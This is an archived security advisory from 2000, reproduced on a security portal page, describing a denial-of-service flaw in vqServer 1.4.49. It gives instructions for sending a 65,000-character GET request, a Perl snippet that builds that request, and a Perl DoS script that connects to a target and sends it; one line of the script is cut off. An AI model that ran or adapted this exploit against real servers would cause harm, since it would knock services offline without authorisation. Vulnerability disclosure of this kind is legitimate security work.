[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : D.o.S in vqServer

Title: D.o.S in vqServer
Released by: DHC
Date: 27th August 2000
Printable version: Click here
DHC Advisory

Advisory for vqServer 1.4.49

vqServer is made by vqSoft. Site: http://www.vqsoft.com

by nemesystm of the DHC

(http://dhcorp.cjb.net - auto45040@hushmail.com)


When sending vqServer version 1.4.49 a malformed URL request it will crash

the service. This has been verified to work on the Windows version, but

it probably is in the linux/unix version and prior versions too.

/-|=[testing it]=|-\

To test this vulnerability, send a GET request with 65000 characters.


GET /AAA (hit return =)

Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste

that much characters in their browser fields (www.server.com/AAA) you will

have to use something like Telnet.

You can easily program something to print 65000 chars in Perl:

open (OUT, ">$ARGV[0]");

print OUT ("GET /");

print OUT ("A" x 65000);

then it's just a cut and paste.

Or you can use the example code below


the latest edition of vqServer (1.9.47) is unaffected by this. It is available

for download at www.vqsoft.com


PUT, POST and the Administration port do not seem to be affected by a high

amount of characters. The Windows version needed a reinstall every five

or so crashes. A reboot or total shutdown did not help.

/-|=[exploit code]=|-\

sinfony quickly wrote some code so you can see if you're vulnerable.


# DoS exploit for vqServer 1.4.49

# This vulnerability was discovered by nemesystm

# (auto45040@hushmail.com)


# code by: sinfony    (chinesef00d@hotmail.com)

# [confess.sins.labs] (http://www.ro0t.nu/csl)

# and DHC member 


# kiddie quote of the year:

#  dude piffy stfu i bet you don't even know how to exploit it

die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n

usage: $0  \n"

if $#ARGV != 0;

use IO::Socket;

$host = $ARGV[0];

$port = 80;

print "Connecting to $host on port $port...\n";

$suck = IO::Socket::INET->




|| die "$host isnt a webserver you schmuck.\n";

$a = A;

$send = $a x 65000;

print "Connected, sending exploit.\n";

print $suck "GET /$send\n";


print "Exploit sent. vqServer should be dead.\n";


(C) 1999-2000 All rights reserved.